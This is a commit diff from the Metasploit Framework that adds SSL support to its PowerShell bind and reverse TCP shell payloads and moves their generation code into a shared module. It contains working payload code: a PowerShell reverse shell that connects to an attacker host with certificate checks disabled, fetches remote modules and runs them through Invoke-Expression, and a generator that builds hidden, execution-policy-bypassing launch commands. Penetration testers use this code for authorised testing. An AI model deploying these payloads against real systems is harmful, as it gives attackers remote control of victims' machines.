Lands rapid7#5327, SSL support + refactor for PowerShell

HD Moore · HD Moore · commit 5f3947312d95 · 2015-05-13T23:25:15.000-05:00
diff --git a/data/exploits/powershell/powerfun.ps1 b/data/exploits/powershell/powerfun.ps1
@@ -10,8 +10,9 @@ function Get-Webclient
 function powerfun 
 { 
     Param( 
-        [String]$Command,
-        [String]$Download
+    [String]$Command,
+    [String]$Sslcon,
+    [String]$Download
     ) 
     Process {
     $modules = @(MODULES_REPLACE)  
@@ -25,19 +26,33 @@ function powerfun
     {
         $client = New-Object System.Net.Sockets.TCPClient("LHOST_REPLACE",LPORT_REPLACE)
     }
+
     $stream = $client.GetStream()
+
+    if ($Sslcon -eq "true") 
+    {
+        $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
+        $sslStream.AuthenticateAsClient("LHOST_REPLACE") 
+        $stream = $sslStream 
+    }
+
     [byte[]]$bytes = 0..255|%{0}
+    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+
     if ($Download -eq "true")
     {
+        $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
+        $stream.Write($sendbytes,0,$sendbytes.Length)
         ForEach ($module in $modules)
         {
             (Get-Webclient).DownloadString($module)|Invoke-Expression
-        } 
+        }
     }
-    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
-    $stream.Write($sendbytes,0,$sendbytes.Length)
+
     $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
     $stream.Write($sendbytes,0,$sendbytes.Length)
+
     while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
     {
         $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
diff --git a/lib/msf/core/payload/windows/powershell.rb b/lib/msf/core/payload/windows/powershell.rb
@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows'
+
+module Msf
+
+###
+#
+# Implements an overarching powershell payload generation module
+#
+###
+
+module Payload::Windows::Powershell
+
+  def generate_powershell_code(conntype)
+    lport = datastore['LPORT']
+    lhost = datastore['LHOST']
+
+    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
+    script_in = ""
+    ::File.open(template_path, "rb") do |fd|
+      script_in << fd.read(fd.stat.size)
+    end
+    mods = ''
+
+    if conntype == "Bind"
+      script_in << "\npowerfun -Command bind"
+    elsif conntype == "Reverse"
+      script_in << "\npowerfun -Command reverse -Sslcon true"
+    end
+
+    if datastore['LOAD_MODULES']
+      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+      mods_array.collect(&:strip)
+      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      mods_array.each {|m| vprint_good " #{m}"}
+      mods = "\"#{mods_array.join("\",\n\"")}\""
+      script_in << " -Download true\n"
+    end
+
+    script_in.gsub!('MODULES_REPLACE', mods)
+    script_in.gsub!('LPORT_REPLACE', lport.to_s)
+    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
+
+    script = Rex::Powershell::Command.compress_script(script_in)
+    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+  end
+end
+end
+
diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
@@ -5,13 +5,16 @@
 
 require 'msf/core'
 require 'msf/base/sessions/powershell'
+require 'msf/core/payload/windows/powershell'
+require 'msf/core/handler/bind_tcp'
 
 module Metasploit3
 
-  CachedSize = 1342
+  CachedSize = 1510
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
+  include Msf::Payload::Windows::Powershell
 
   def initialize(info = {})
     super(merge_info(info,
@@ -45,33 +48,7 @@ def initialize(info = {})
   end
 
   def generate
-    lport = datastore['LPORT']
-    lhost = datastore['LHOST']
-
-    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
-    script_in = ""
-    ::File.open(template_path, "rb") do |fd|
-      script_in << fd.read(fd.stat.size)
-    end
-    script_in << "\npowerfun -Command bind"
-
-    mods = ''
-
-    if datastore['LOAD_MODULES']
-      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
-      mods_array.collect(&:strip)
-      vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
-      mods_array.each {|m| vprint_good " #{m}"}
-      mods = "\"#{mods_array.join("\",\n\"")}\""
-      script_in << " -Download true\n"
-    end
-
-    script_in.gsub!('MODULES_REPLACE', mods)
-    script_in.gsub!('LPORT_REPLACE', lport.to_s)
-    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
-
-    script = Rex::Powershell::Command.compress_script(script_in)
-    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+    generate_powershell_code("Bind")
   end
 
 end
diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -5,13 +5,16 @@
 
 require 'msf/core'
 require 'msf/base/sessions/powershell'
+require 'msf/core/payload/windows/powershell'
+require 'msf/core/handler/reverse_tcp_ssl'
 
 module Metasploit3
 
-  CachedSize = 1342
+  CachedSize = 1518
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
+  include Msf::Payload::Windows::Powershell
 
   def initialize(info = {})
     super(merge_info(info,
@@ -29,7 +32,7 @@ def initialize(info = {})
       'License'       => MSF_LICENSE,
       'Platform'      => 'windows',
       'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcp,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
       'Session'       => Msf::Sessions::PowerShell,
       'RequiredCmd'   => 'generic',
       'Payload'       =>
@@ -45,34 +48,7 @@ def initialize(info = {})
   end
 
   def generate
-    lport = datastore['LPORT']
-    lhost = datastore['LHOST']
-
-    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
-    script_in = ""
-    ::File.open(template_path, "rb") do |fd|
-      script_in << fd.read(fd.stat.size)
-    end
-
-    script_in << "\npowerfun -Command reverse"
-
-    mods = ''
-
-    if datastore['LOAD_MODULES']
-      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
-      mods_array.collect(&:strip)
-      vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
-      mods_array.each {|m| vprint_good " #{m}"}
-      mods = "\"#{mods_array.join("\",\n\"")}\""
-      script_in << " -Download true\n"
-    end
-
-    script_in.gsub!('MODULES_REPLACE', mods)
-    script_in.gsub!('LPORT_REPLACE', lport.to_s)
-    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
-
-    script = Rex::Powershell::Command.compress_script(script_in)
-    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+    generate_powershell_code("Reverse")
   end
 
 end
diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -4,20 +4,23 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/windows/exec'
+require 'msf/core/payload/windows/powershell'
 require 'msf/base/sessions/powershell'
+require 'msf/core/handler/bind_tcp'
+
 ###
 #
 # Extends the Exec payload to add a new user.
 #
 ###
 module Metasploit3
 
-  CachedSize = 1543
+  CachedSize = 1695
 
   include Msf::Payload::Windows::Exec
   include Rex::Powershell::Command
+  include Msf::Payload::Windows::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -52,33 +55,6 @@ def initialize(info = {})
   # Override the exec command string
   #
   def command_string
-    lport = datastore['LPORT']
-
-    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
-    script_in = ""
-    ::File.open(template_path, "rb") do |fd|
-      script_in << fd.read(fd.stat.size)
-    end
-
-    script_in = File.read(template_path)
-    script_in << "\npowerfun -Command bind"
-
-    mods = ''
-
-    if datastore['LOAD_MODULES']
-      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
-      mods_array.collect(&:strip)
-      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
-      mods_array.each {|m| vprint_good " #{m}"}
-      mods = "\"#{mods_array.join("\",\n\"")}\""
-      script_in << " -Download true\n"
-    end
-
-    script_in.gsub!('MODULES_REPLACE', mods)
-    script_in.gsub!('LPORT_REPLACE', lport.to_s)
-
-    script = Rex::Powershell::Command.compress_script(script_in)
-    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
-
+    generate_powershell_code("Bind")
   end
 end
diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -4,19 +4,22 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/exec'
+require 'msf/core/payload/windows/powershell'
 require 'msf/base/sessions/powershell'
+require 'msf/core/handler/reverse_tcp_ssl'
+
 ###
 #
 # Extends the Exec payload to add a new user.
 #
 ###
 module Metasploit3
 
-  CachedSize = 1527
+  CachedSize = 1703
 
   include Msf::Payload::Windows::Exec
+  include Msf::Payload::Windows::Powershell
   include Rex::Powershell::Command
 
   def initialize(info = {})
@@ -35,7 +38,7 @@ def initialize(info = {})
       'License'       => MSF_LICENSE,
       'Platform'      => 'win',
       'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::ReverseTcp,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
       'Session'       => Msf::Sessions::PowerShell,
       ))
 
@@ -52,33 +55,6 @@ def initialize(info = {})
   # Override the exec command string
   #
   def command_string
-    lport = datastore['LPORT']
-    lhost = datastore['LHOST']
-
-    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
-    script_in = ""
-    ::File.open(template_path, "rb") do |fd|
-      script_in << fd.read(fd.stat.size)
-    end
-    script_in << "\npowerfun -Command reverse"
-
-    mods = ''
-
-    if datastore['LOAD_MODULES']
-      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
-      mods_array.collect(&:strip)
-      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
-      mods_array.each {|m| vprint_good " #{m}"}
-      mods = "\"#{mods_array.join("\",\n\"")}\""
-      script_in << " -Download true\n"
-    end
-
-    script_in.gsub!('MODULES_REPLACE', mods)
-    script_in.gsub!('LPORT_REPLACE', lport.to_s)
-    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
-
-    script = Rex::Powershell::Command.compress_script(script_in)
-    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
-
+    generate_powershell_code("Reverse")
   end
 end
